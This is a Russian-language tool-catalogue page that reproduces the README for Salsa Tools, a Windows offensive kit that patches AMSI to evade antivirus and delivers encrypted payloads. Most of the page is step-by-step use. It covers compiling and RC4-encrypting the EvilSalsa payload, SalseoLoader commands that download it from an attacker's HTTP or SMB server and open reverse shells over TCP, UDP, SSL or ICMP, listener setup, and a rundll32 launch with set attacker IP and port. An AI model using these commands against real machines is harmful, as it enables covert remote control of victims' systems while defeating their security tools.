Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Salsa-tools — Salsa Tools - ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP/Shellcode/SILENTTRINITY и обход AV, патч AMSI | Kitploit
Инструменты/GitHubGitHub/hackplayers/salsa-tools
Повышение привилегийИнструменты шифрования/дешифрованияЭксплуатацияОбход IDS/IPSЛатеральное перемещениеШелл-кодПост-эксплуатацияКомандование и УправлениеRed TeamingРазработка Полезной Нагрузки
GitHubhackplayers/salsa-tools
5871306 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Salsa-tools

Salsa Tools - ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP/Shellcode/SILENTTRINITY и обход AV, патч AMSI

Репозиторий

License

root@kitploit:~
   _____       __              ______            __    
  / ___/____ _/ /________ _   /_  __/___  ____  / /____
  \__ \/ __ `/ / ___/ __ `/    / / / __ \/ __ \/ / ___/
 ___/ / /_/ / (__  ) /_/ /    / / / /_/ / /_/ / (__  ) 
/____/\__,_/_/____/\__,_/    /_/  \____/\____/_/____/  

Salsa Tools - Безопасный от AV обратный шелл, обмакнутый в соус bellota

Salsa Tools — это набор из трёх различных инструментов, которые в совокупности позволяют получить обратный шелл с расширенными возможностями в любой среде Windows без необходимости использования PowerShell для его выполнения. Чтобы обойти новейшие методы обнаружения (AMSI), большинство компонентов изначально были написаны на C#. Salsa Tools был публично выпущен Луисом Вакасом во время его доклада «Inmersión en la explotación tiene rima», который прошёл на конференции h-c0n 9 февраля 2019 года.

Особенности

root@kitploit:~
* TCP/UDP/ICMP/DNS/BIND/SSL/Shellcode/SilentTrinity     
* Безопасность от AV (17 февраля)
* Патчеры AMSI
* Выполнение PowerShell 
* ...

Обзор

Salsa-Tools состоит из трёх различных ингредиентов: - EvilSalsa - EncrypterAssembly - SalseoLoader И его поведение следующее:

Настройка

Требования

  • Visual Studio 2017 (или аналогичная)
    • Зависимости Microsoft.PowerShell.3.ReferenceAssemblies при компиляции под .NET 4.0
    • Зависимости Microsoft.PowerShell.2.ReferenceAssemblies при компиляции под .NET 3.5
  • Python 2.7

Запуск Salsa

Готовим EvilSalsa

root@kitploit:~
   ___ __ __  ____  _            
  /  _]  |  ||    || |           
 /  [_|  |  | |  | | |           
|    _]  |  | |  | | |___        
|   [_|  :  | |  | |     |       
|     |\   /  |  | |     |       
|_____| \_/  |____||_____|       
                                 
  _____  ____  _     _____  ____ 
 / ___/ /    || |   / ___/ /    |
(   \_ |  o  || |  (   \_ |  o  |
 \__  ||     || |___\__  ||     |
 /  \ ||  _  ||     /  \ ||  _  |
 \    ||  |  ||     \    ||  |  |
  \___||__|__||_____|\___||__|__|
  
[+] Это наша полезная нагрузка
                                 

EvilSalsa — ключевой ингредиент этого рецепта. Он содержит полезную нагрузку, которая выполняется в системе следующим образом: как только нагрузка запускается, она загружает System.Management.Automation.dll, который создаёт runspace. Внутри этого runspace у нас есть четыре типа оболочек (TCP / UDP / ICMP / DNS / BINDTCP / SHELLCODE / SILENTTRINITY). После загрузки EvilSalsa первым делом проверяется наличие c:\windows\system32\amsi.dll. Если он существует, он патчится с помощью домашней вариации обходов CyberArk и Rastamouse.

Смешиваем EncrypterAssembly и Evilsalsa

root@kitploit:~
  ______                             _            
 |  ____|                           | |           
 | |__   _ __   ___ _ __ _   _ _ __ | |_ ___ _ __ 
 |  __| | '_ \ / __| '__| | | | '_ \| __/ _ \ '__|
 | |____| | | | (__| |  | |_| | |_) | ||  __/ |   
 |______|_| |_|\___|_|   \__, | .__/ \__\___|_|   
     /\                   __/ | || |   | |        
    /  \   ___ ___  ___ _|___/|_|| |__ | |_   _   
   / /\ \ / __/ __|/ _ \ '_ ` _ \| '_ \| | | | |  
  / ____ \\__ \__ \  __/ | | | | | |_) | | |_| |  
 /_/    \_\___/___/\___|_| |_| |_|_.__/|_|\__, |  
                                           __/ |  
                                          |___/   
			  
 [+] Программа, шифрующая полезную нагрузку с помощью RC4
 [+] Есть версия на Python и версия в виде .exe

EncrypterAssembly можно использовать как Python-скрипт или как исполняемый файл. Он шифрует ранее сгенерированный EvilSalsa.

Использование в Python:

root@kitploit:~
python encrypterassembly.py <FILE> <PASSWORD> <OUTPUT>

Исполняемый файл:

root@kitploit:~
Encrypterassembly.exe <FILE> <PASSWORD> <OUTPUT>

Подаём зашифрованный EvilSalsa на стол с помощью SalseoLoader

SalseoLoader отвечает за загрузку зашифрованной полезной нагрузки. Может быть скомпилирован как библиотека или как исполняемый файл. Если он запускается как исполняемый файл, необходимые аргументы должны быть указаны при запуске. Если он скомпилирован как библиотека, должен быть экспортирован дескриптор "main". Аргументы передаются через переменные окружения.

root@kitploit:~
  _____  ____  _     _____   ___   ___
 / ___/ /    || |   / ___/  /  _] /   \
(   \_ |  o  || |  (   \_  /  [_ |     |
 \__  ||     || |___\__  ||    _]|  O  |
 /  \ ||  _  ||     /  \ ||   [_ |     |
 \    ||  |  ||     \    ||     ||     |
  \___||__|__||_____|\___||_____| \___/

 _       ___    ____  ___      ___  ____
| |     /   \  /    ||   \    /  _]|    \
| |    |     ||  o  ||    \  /  [_ |  D  )
| |___ |  O  ||     ||  D  ||    _]|    /
|     ||     ||  _  ||     ||   [_ |    \
|     ||     ||  |  ||     ||     ||  .  \
|_____| \___/ |__|__||_____||_____||__|\_|

                             Автор: CyberVaca@HackPlayers

[+] Использование:

    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT
    [-] SalseoLoader.exe password \\smbserver.com\evil\elfuckingmal.txt ReverseUDP LHOST LPORT
    [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseICMP LHOST
    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS
    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT
    [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseSSL LHOST LPORT
    [-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode
    [-] SalseoLoader.exe password http://webserver.com/silent.txt silenttrinity URL_C2C

[+] Доступные полезные нагрузки:

    [-] ReverseTCP  [-] ReverseDNS   [-] ReverseSSL  [-] Shellcode
    [-] ReverseUDP  [-] ReverseICMP  [-] BindTCP     [-] SilentTrinity

Учебное пособие

Компиляция двоичных файлов

Скачайте исходный код из репозитория GitHub и скомпилируйте EvilSalsa и SalseoLoader. Для компиляции кода вам потребуется установленная Visual Studio.

Скомпилируйте эти проекты для архитектуры той Windows-машины, где вы будете их использовать (если Windows поддерживает x64, компилируйте для этой архитектуры).

Вы можете выбрать архитектуру в Visual Studio на вкладке "Build" слева в поле "Platform Target".

(Если вы не можете найти эти параметры, нажмите на вкладку "Project", затем " Properties")

Затем соберите оба проекта (Build -> Build Solution). В журнале появится путь к исполняемому файлу:

Подготовка бэкдора

Прежде всего, вам нужно закодировать EvilSalsa.dll. Для этого можно использовать Python-скрипт encrypterassembly.py или скомпилировать проект EncrypterAssembly.

Python

root@kitploit:~
python EncrypterAssembly/encrypterassembly.py <ФАЙЛ> <ПАРОЛЬ> <ВЫХОДНОЙ_ФАЙЛ>
python EncrypterAssembly/encrypterassembly.py EvilSalsa.dll password evilsalsa.dll.txt

Windows

root@kitploit:~
EncrypterAssembly.exe <ФАЙЛ> <ПАРОЛЬ> <ВЫХОДНОЙ_ФАЙЛ>
EncrypterAssembly.exe EvilSalsa.dll password evilsalsa.dll.txt

Отлично, теперь у вас есть всё необходимое для запуска всей этой сальсы: закодированный EvilSalsa.dll и бинарник SalseoLoader. Загрузите бинарник SalseoLoader.exe на машину. Он не должен обнаруживаться ни одним антивирусом...

Запуск бэкдора

Получение TCP-обратного шелла (загрузка закодированной DLL через HTTP)

Не забудьте запустить nc как слушатель для обратного шелла и HTTP-сервер для раздачи закодированного evilsalsa.

SalseoLoader.exe password http://<IP-атакующего>/evilsalsa.dll.txt reversetcp <IP-атакующего> <Порт>

Получение UDP-обратного шелла (загрузка закодированной DLL через SMB)

Не забудьте запустить nc как слушатель для обратного шелла и SMB-сервер для раздачи закодированного evilsalsa (impacket-smbserver).

SalseoLoader.exe password \\<IP-атакующего>/folder/evilsalsa.dll.txt reverseudp <IP-атакующего> <Порт>

Получение TCP-обратного шелла SSL (используя локальный файл)

Настройте слушатель на машине атакующего:

root@kitploit:~
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -key key.pem -cert cert.pem -port <порт> -tls1

Запустите бэкдор:

root@kitploit:~
SalseoLoader.exe password C:/path/to/evilsalsa.dll.txt ReverseSSL <IP-атакующего> <Порт>

Получение ICMP-обратного шелла (закодированная DLL уже на жертве)

На этот раз на стороне клиента нужна специальная программа для приёма обратного шелла. Скачайте: [https://github.com/inquisb/icmpsh]

Отключите ICMP-ответы:

root@kitploit:~

#По окончании можно снова включить их, выполнив:
sysctl -w net.ipv4.icmp_echo_ignore_all=0

Запустите клиент:

python icmpsh_m.py "<IP-атакующего>" "<IP-жертвы>"

На жертве выполните сальсу:

SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <IP-атакующего>

Компиляция SalseoLoader как DLL с экспортом функции main

Откройте проект SalseoLoader в Visual Studio.

Добавьте перед функцией main: [DllExport]

Перед функцией main добавьте эту строку: [DllExport]

Установите DllExport для этого проекта

Tools --> NuGet Package Manager --> Manage NuGet Packages for Solution...

Найдите пакет DllExport (используя вкладку Browse) и нажмите Install (и подтвердите всплывающее окно)

В папке вашего проекта появились файлы: DllExport.bat и DllExport_Configure.bat

Удалите DllExport

Нажмите Uninstall (да, это странно, но поверьте, это необходимо)

Закройте Visual Studio и запустите DllExport_configure

Просто закройте Visual Studio.

Затем перейдите в папку SalseoLoader и запустите DllExport_Configure.bat Выберите x64 (если вы будете использовать его на машине с x64, в моём случае было так), выберите System.Runtime.InteropServices (в разделе Namespace for DllExport) и нажмите Apply

Снова откройте проект в Visual Studio

[DllExport] больше не должен помечаться как ошибка

Соберите решение

Выберите Output Type = Class Library (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)

Выберите платформу x64 (Project --> SalseoLoader Properties --> Build --> Platform target = x64)

Чтобы собрать решение: Build --> Build Solution (В консоли вывода появится путь к новой DLL)

Протестируйте созданную DLL

Скопируйте и вставьте DLL туда, где вы хотите её протестировать.

Выполните:

rundll32.exe SalseoLoader.dll,main

Если ошибки не появились, вероятно, у вас рабочая DLL!!

Получение шелла с помощью DLL

Не забудьте запустить HTTP-сервер и nc-слушатель

Powershell

root@kitploit:~
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main

CMD

root@kitploit:~
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main

Документировано https://github.com/carlospolop-forks/

Скачать инструмент